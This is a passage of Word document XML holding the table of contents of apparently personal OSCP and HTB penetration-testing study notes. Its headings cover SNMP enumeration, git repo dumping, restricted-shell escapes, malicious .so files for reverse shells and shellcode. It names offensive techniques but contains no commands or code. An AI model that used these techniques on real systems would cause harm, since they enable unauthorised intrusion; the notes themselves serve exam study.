        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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q2pb6baqm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helpful SNMP commands</w:t>
              <w:tab/>
              <w:t xml:space="preserve">582</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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lo8vcuie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from OSCP-A regarding installed applications</w:t>
              <w:tab/>
              <w:t xml:space="preserve">584</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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rb1uyaau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from OSCP-B regarding looking at interesting non-default MIB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">584</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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z6ao8k87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(HTB)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">586</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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8q6iyvigpl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ENUMERATING SNMP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">588</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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uxolg1f50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enable HOST-RESOURCES-MIB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">589</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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zqe5hririp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rsync</w:t>
              <w:tab/>
              <w:t xml:space="preserve">590</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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xuokffjarq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Git</w:t>
              <w:tab/>
              <w:t xml:space="preserve">591</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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f6dojytz2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access git repo that is not owned by you</w:t>
              <w:tab/>
              <w:t xml:space="preserve">591</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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5e9mw89uu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complex git example</w:t>
              <w:tab/>
              <w:t xml:space="preserve">592</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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uc2lw9a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git example</w:t>
              <w:tab/>
              <w:t xml:space="preserve">595</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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pru9x9lqk6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Git-dumper (to recreate repo)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">599</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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p5xdswd7c8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GitHub</w:t>
              <w:tab/>
              <w:t xml:space="preserve">600</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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yrkopg6a2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to download software with requirements:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">601</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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pattia3hx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ExploitDB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">601</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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opbjai5itf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Hosts</w:t>
              <w:tab/>
              <w:t xml:space="preserve">603</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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ntgfk3gdq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users in Linux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">604</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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lbqdgeko6j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Vagrant</w:t>
              <w:tab/>
              <w:t xml:space="preserve">604</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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am44g81ut7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DNS (port 53)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">605</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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b452a4lpxa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IP of a machine given its FQDN or hostname using nslookup</w:t>
              <w:tab/>
              <w:t xml:space="preserve">606</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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ycpbmxbmtp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PDF</w:t>
              <w:tab/>
              <w:t xml:space="preserve">606</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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xdx2f8hdv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Linux General</w:t>
              <w:tab/>
              <w:t xml:space="preserve">607</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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ry353zfk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Recursively looking through directory</w:t>
              <w:tab/>
              <w:t xml:space="preserve">608</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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6rdlw7cv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w:t>
              <w:tab/>
              <w:t xml:space="preserve">608</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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01j719hnd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UID and GID</w:t>
              <w:tab/>
              <w:t xml:space="preserve">609</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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on7bld48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tab/>
              <w:t xml:space="preserve">609</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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nzojfq9a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things to know about Linux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">609</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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y5x8t4s5p8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Bash</w:t>
              <w:tab/>
              <w:t xml:space="preserve">610</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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k60137xc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Fuzzing web directories with bash scripting</w:t>
              <w:tab/>
              <w:t xml:space="preserve">611</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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04l9c8oqr7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Python</w:t>
              <w:tab/>
              <w:t xml:space="preserve">612</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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n9nao10g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change code from python2 to python3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">612</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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018qyuytl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a bash shell when running python</w:t>
              <w:tab/>
              <w:t xml:space="preserve">612</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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tx7l4q9ns8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Python Hosting (to Transfer files to target)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">613</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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1qvicbmloc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rbash (restricted bash)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">613</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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4nahmigy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Escaping restricted shell tips</w:t>
              <w:tab/>
              <w:t xml:space="preserve">614</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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e5w2rlo7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Escaping restricted shell using SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">614</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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m2k3m6p0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Escaping restricted shell using ed</w:t>
              <w:tab/>
              <w:t xml:space="preserve">615</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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ojlv1qs6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Escaping restricted shell using vi</w:t>
              <w:tab/>
              <w:t xml:space="preserve">616</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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a11ookcye3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Sublime Text</w:t>
              <w:tab/>
              <w:t xml:space="preserve">617</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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aujm93ad7i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Nano</w:t>
              <w:tab/>
              <w:t xml:space="preserve">619</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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g43f23qh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Java and .jar</w:t>
              <w:tab/>
              <w:t xml:space="preserve">622</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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usaeut9th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RDP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">624</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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nnlwwxzvhw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Creating malicious .so files for rev shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">624</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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w6gtha03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1</w:t>
              <w:tab/>
              <w:t xml:space="preserve">625</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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59rzjy8k7q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Everything about C (gcc, glibc, ldd, .so, -fPIC, -static)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">626</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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c2cbrkmn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XenSpawn</w:t>
              <w:tab/>
              <w:t xml:space="preserve">626</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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wa6axc044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Xenspawn walkthrough</w:t>
              <w:tab/>
              <w:t xml:space="preserve">627</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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w0v0dqkxu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-static vs. dynamically linked</w:t>
              <w:tab/>
              <w:t xml:space="preserve">628</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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th69kfo7f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Glibc</w:t>
              <w:tab/>
              <w:t xml:space="preserve">630</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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m3q2ptso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-fPIC and -shared</w:t>
              <w:tab/>
              <w:t xml:space="preserve">630</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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zsmkr7k4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files</w:t>
              <w:tab/>
              <w:t xml:space="preserve">631</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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4xikvd3q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ldd</w:t>
              <w:tab/>
              <w:t xml:space="preserve">632</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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huryag18u4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compile C program (use .c files)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">633</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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anqwl6hb6u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Cross-Compiling</w:t>
              <w:tab/>
              <w:t xml:space="preserve">636</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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evh5g7em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to .exe</w:t>
              <w:tab/>
              <w:t xml:space="preserve">636</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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khvy6bhh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.cpp to .exe</w:t>
              <w:tab/>
              <w:t xml:space="preserve">637</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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dd9gwuvwcr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knockd (port knocking)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">638</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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a1sy8a0neh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Shellcode</w:t>
              <w:tab/>
              <w:t xml:space="preserve">640</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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mfwt14wf70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Javascript</w:t>
              <w:tab/>
              <w:t xml:space="preserve">641</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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jitu5neqr0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Wireshark</w:t>
              <w:tab/>
              <w:t xml:space="preserve">641</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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h3umgq3eo5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Cyberchef</w:t>
              <w:tab/>
              <w:t xml:space="preserve">642</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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fgzp4n09la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Zip (.zip)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">642</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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pfxe1hnmm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gzip (.gz)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">643</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
